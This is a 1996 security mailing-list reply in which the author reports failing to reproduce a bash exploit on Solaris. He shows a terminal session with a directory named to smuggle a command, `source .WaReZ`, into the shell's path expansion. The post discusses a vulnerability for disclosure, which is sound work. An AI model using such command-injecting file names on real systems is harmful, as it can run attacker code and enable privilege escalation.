Re: BoS: tee see shell problems

[travis () EvTech com (Travis Hassloch x231)]

In message <Pine.LNX.3.94.960913223432.23513A-100000 () primeline net> you write:
> I just tested a variation of this exploit with bash 1.14.6(1)
> running on Linux 2.0.13.  By using my variation I managed to become root.

Funny, I couldn't get it to work on Solaris:

bash$ bash -version
GNU bash, version 1.14.5(1)
bash$ ls -la
total 12
drwx------  2 travis         60 Sep 16 14:20 .
drwxrwxrwx  5 root          949 Sep 16 14:20 ..
-rwx------  1 travis         61 Sep 16 14:23 .WaReZ
bash$ cat .WaReZ
echo Im a lamer, lookatmee whohoo
touch /tmp/bar
echo u loze
bash$ pwd
/tmp/`source .WaReZ'
bash$ cd ..
bash$ cd *W*
bash$ ls -la /tmp/bar
/tmp/bar not found
bash$ pwd
/tmp/`source .WaReZ'

# to prove that it really works:
bash$ source .WaReZ
Im a lamer, lookatmee whohoo
u loze

Am I missing something here?
I also tried simpler names like /tmp/`echo hi` - again, didn't work.